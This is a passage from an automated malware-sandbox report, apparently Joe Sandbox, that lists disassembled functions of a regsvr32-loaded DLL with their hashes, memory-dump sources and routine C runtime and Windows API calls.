                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: CompareErrorInfoLastString
                                                                      • String ID:
                                                                      • API String ID: 3723911898-0
                                                                      • Opcode ID: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
                                                                      • Instruction ID: f82eaf406bed8affdf51ca7cb57148984e75547b16354a8c59cdadbc4a9fb6f5
                                                                      • Opcode Fuzzy Hash: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
                                                                      • Instruction Fuzzy Hash: BAE18C22A0C2829AEB308F219D452BD6BD2FB46794F5CC535DA5E47FC9DEBCA944C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A76A0 Relevance: 19.7, APIs: 13, Instructions: 182COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: Pointer$DecodeEncode$ConsoleCtrlErrorHandlerLast__doserrno_errno_lock
                                                                      • String ID:
                                                                      • API String ID: 3466867069-0
                                                                      • Opcode ID: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
                                                                      • Instruction ID: d3334ca6bfa4a619a75344c4c7894be012e39d1dd0a65f70dc860777c7d5d8b7
                                                                      • Opcode Fuzzy Hash: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
                                                                      • Instruction Fuzzy Hash: B4716A21E09646C1FAAB97189C5527D22D6EF87780F1CC536C55E06EEDDFECE881E202
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A2E18 Relevance: 18.1, APIs: 12, Instructions: 82COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: free$_lock$ErrorFreeHeapLast_errno
                                                                      • String ID:
                                                                      • API String ID: 1575098132-0
                                                                      • Opcode ID: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
                                                                      • Instruction ID: d7865fb9125a5e610d99e565f3becfe5f9375e84cf457f0715e7b33363367bb3
                                                                      • Opcode Fuzzy Hash: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
                                                                      • Instruction Fuzzy Hash: 16313E11F4A582C5FE68EBA19D5237852D0EF82B44F0C9135DA1E06ECECF9CE890A351
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AA250 Relevance: 15.3, APIs: 10, Instructions: 253COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: free$ErrorInfoLast
                                                                      • String ID:
                                                                      • API String ID: 189849726-0
                                                                      • Opcode ID: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
                                                                      • Instruction ID: 21b5d696cd269a8d55f3ca4f275c120f79a39323640204e8950000b44e8f4214
                                                                      • Opcode Fuzzy Hash: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
                                                                      • Instruction Fuzzy Hash: 73B1CF32A086D2C6DB21CF25A8402AD77E4FB4A744F488136EB9C87B99DFBDD851D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A3EEC Relevance: 15.1, APIs: 10, Instructions: 121COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLastfree
                                                                      • String ID:
                                                                      • API String ID: 994105223-0
                                                                      • Opcode ID: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
                                                                      • Instruction ID: 7cab5694b79416d6816a9c3e0bfab3343c7fd7bc0b6ba1c615681f4e7f334648
                                                                      • Opcode Fuzzy Hash: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
                                                                      • Instruction Fuzzy Hash: 67413D22A19396C6EA689B11AD45039A7E5FF46B90F1C8434DA4E17F5CCFBCA4A1E700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A4F04 Relevance: 13.8, APIs: 11, Instructions: 90COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: free$ErrorFreeHeapLast_errno
                                                                      • String ID:
                                                                      • API String ID: 1012874770-0
                                                                      • Opcode ID: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
                                                                      • Instruction ID: 86b263c53362f44844e87024ff503d8919ad4725425bb773d565b76cde23770f
                                                                      • Opcode Fuzzy Hash: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
                                                                      • Instruction Fuzzy Hash: 2C41EB32E0A582C5EE65DF61DD523B823E0EF86B44F0C9431DB0D4AE99CFADA491D351
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526B0A34 Relevance: 13.8, APIs: 9, Instructions: 256COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: free$_errno$DecodeEnvironmentPointerVariable__wtomb_environ
                                                                      • String ID:
                                                                      • API String ID: 3451773520-0
                                                                      • Opcode ID: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
                                                                      • Instruction ID: 77767c278d976d491d0e45c454912c71da6eea2decc0094fceb35f6a6c4d38f6
                                                                      • Opcode Fuzzy Hash: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
                                                                      • Instruction Fuzzy Hash: 4CA1D526E0964281FA20AB24AD1027A6AD1FF43798F1CC635DA1D47FCDEFBDE4959300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AE23C Relevance: 13.7, APIs: 9, Instructions: 177COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE292
                                                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE2B1
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE356
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE3B5
                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE3F0
                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE42C
                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE46C
                                                                      • free.LIBCMT ref: 00007FFA526AE47A
                                                                      • free.LIBCMT ref: 00007FFA526AE49C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$Infofree
                                                                      • String ID:
                                                                      • API String ID: 1638741495-0
                                                                      • Opcode ID: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
                                                                      • Instruction ID: b79bd0376a41900c70ae05a94ce4f7842a117a2ab4cf02893baa3e8bcb15df3d
                                                                      • Opcode Fuzzy Hash: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
                                                                      • Instruction Fuzzy Hash: 3A61D332A08682C6EB249B259C40179A6D5FF867A8F5C8A35DA5D47FDCDFBCD4419200
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A352C Relevance: 13.6, APIs: 9, Instructions: 98COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: DecodePointer$_initterm$ExitProcess_lock
                                                                      • String ID:
                                                                      • API String ID: 2551688548-0
                                                                      • Opcode ID: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                      • Instruction ID: 33f444e0da0187ea93abecfa1ae78abfc9036419fb9cd62c93f698dae81a71b5
                                                                      • Opcode Fuzzy Hash: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                      • Instruction Fuzzy Hash: 6F418121A0E682C1EA549B15EC8013962D4FF8A7C4F5CD134EA4E43FADEFBCE4659701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A8F34 Relevance: 12.2, APIs: 8, Instructions: 173COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFA526A9206), ref: 00007FFA526A8F94
                                                                      • GetLastError.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFA526A9206), ref: 00007FFA526A8FA6
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFA526A9206), ref: 00007FFA526A9006
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFA526A9206), ref: 00007FFA526A90BC
                                                                      • GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFA526A9206), ref: 00007FFA526A90D3
                                                                      • free.LIBCMT ref: 00007FFA526A90E4
                                                                      • GetStringTypeA.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFA526A9206), ref: 00007FFA526A9161
                                                                      • free.LIBCMT ref: 00007FFA526A9171
                                                                        • Part of subcall function 00007FFA526AE23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE292
                                                                        • Part of subcall function 00007FFA526AE23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE2B1
                                                                        • Part of subcall function 00007FFA526AE23C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE3B5
                                                                        • Part of subcall function 00007FFA526AE23C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE3F0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$StringType$Infofree$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 3535580693-0
                                                                      • Opcode ID: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                      • Instruction ID: e93a7aa52b920c627ce623a401c6176657317d0c21b6cec04c66e6cf5db3b57b
                                                                      • Opcode Fuzzy Hash: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                      • Instruction Fuzzy Hash: D8619132A05682C6EB209F21DC8546D67D2FB46BE8B288235DA1D57FDCCFB8E8419740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A3758 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetStartupInfoA.KERNEL32 ref: 00007FFA526A377D
                                                                        • Part of subcall function 00007FFA526A3108: Sleep.KERNEL32(?,?,0000000A,00007FFA526A2DA3,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A314D
                                                                      • GetFileType.KERNEL32 ref: 00007FFA526A38FA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: FileInfoSleepStartupType
                                                                      • String ID: @
                                                                      • API String ID: 1527402494-2766056989
                                                                      • Opcode ID: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                      • Instruction ID: a433edca7d9ae361cc6e723e75260d688a524cb8d0acc753fa62a63f648d6288
                                                                      • Opcode Fuzzy Hash: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                      • Instruction Fuzzy Hash: 0B918D22A18682C1E7158B24DC482282BE5FB07774F698735CA7E47BD8DFBCE852D301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A25F8 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 195COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$_getptd
                                                                      • String ID: +$-$0$0
                                                                      • API String ID: 3432092939-699404926
                                                                      • Opcode ID: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                      • Instruction ID: bd637ac3429172a90c8314fe3eebb1e288a879ec596e92c6c31489e7cbedb9f3
                                                                      • Opcode Fuzzy Hash: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                      • Instruction Fuzzy Hash: 1871E222D8D682C1FBB64B158C1437A26D1EF42754F2DC136DA5E02AD9DFACE9C4A301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A6AB8 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _FF_MSGBANNER.LIBCMT ref: 00007FFA526A6ADF
                                                                        • Part of subcall function 00007FFA526A6F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFA526A7194,?,?,?,?,00007FFA526A6C69,?,?,00000000,00007FFA526A30C0), ref: 00007FFA526A6FCF
                                                                        • Part of subcall function 00007FFA526A334C: ExitProcess.KERNEL32 ref: 00007FFA526A335B
                                                                        • Part of subcall function 00007FFA526A309C: Sleep.KERNEL32(?,?,00000000,00007FFA526A6B19,?,?,00000000,00007FFA526A6BC3,?,?,?,?,?,?,00000000,00007FFA526A2DC8), ref: 00007FFA526A30D2
                                                                      • _errno.LIBCMT ref: 00007FFA526A6B21
                                                                      • _lock.LIBCMT ref: 00007FFA526A6B35
                                                                      • free.LIBCMT ref: 00007FFA526A6B57
                                                                      • _errno.LIBCMT ref: 00007FFA526A6B5C
                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FFA526A6BC3,?,?,?,?,?,?,00000000,00007FFA526A2DC8,?,?,?,00007FFA526A2DFF), ref: 00007FFA526A6B82
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfree
                                                                      • String ID:
                                                                      • API String ID: 1354249094-0
                                                                      • Opcode ID: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
                                                                      • Instruction ID: 279ff915f7689b6e6897f3f12e9580163a4978c1cc0d746f1adacf4e29d060a6
                                                                      • Opcode Fuzzy Hash: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
                                                                      • Instruction Fuzzy Hash: 0D218021E1A642C2FA64AB109C4137A62D5EF87780F0CD034E64E47ECACFBCE850A700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A2D70 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A2D7A
                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A2D88
                                                                      • SetLastError.KERNEL32(?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A2DE0
                                                                        • Part of subcall function 00007FFA526A3108: Sleep.KERNEL32(?,?,0000000A,00007FFA526A2DA3,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A314D
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A2DB4
                                                                      • free.LIBCMT ref: 00007FFA526A2DD7
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00007FFA526A2DC8
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                      • String ID:
                                                                      • API String ID: 3106088686-0
                                                                      • Opcode ID: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
                                                                      • Instruction ID: 1993135a33258d59ffd43ea5ab06a1cb9bde92a77f78e6b8a557dac66f017d74
                                                                      • Opcode Fuzzy Hash: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
                                                                      • Instruction Fuzzy Hash: 42014424A09B83C6FB64AB659C4513862E2FF4A7A0B5CC634D96E02BDDDF7CE484D710
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A9DF8 Relevance: 8.8, APIs: 7, Instructions: 36COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: free$ErrorFreeHeapLast_errno
                                                                      • String ID:
                                                                      • API String ID: 1012874770-0
                                                                      • Opcode ID: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
                                                                      • Instruction ID: a1caf652c2cd1739567276f0bb7391f11962e54f3cc726eba39ecf506dcc5c26
                                                                      • Opcode Fuzzy Hash: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
                                                                      • Instruction Fuzzy Hash: ED01D612E09442D1EE68DBA1DD9203813E1EF82704F5C9031D64E42D9ACFE9F8919390
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A9E90 Relevance: 7.7, APIs: 6, Instructions: 246COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
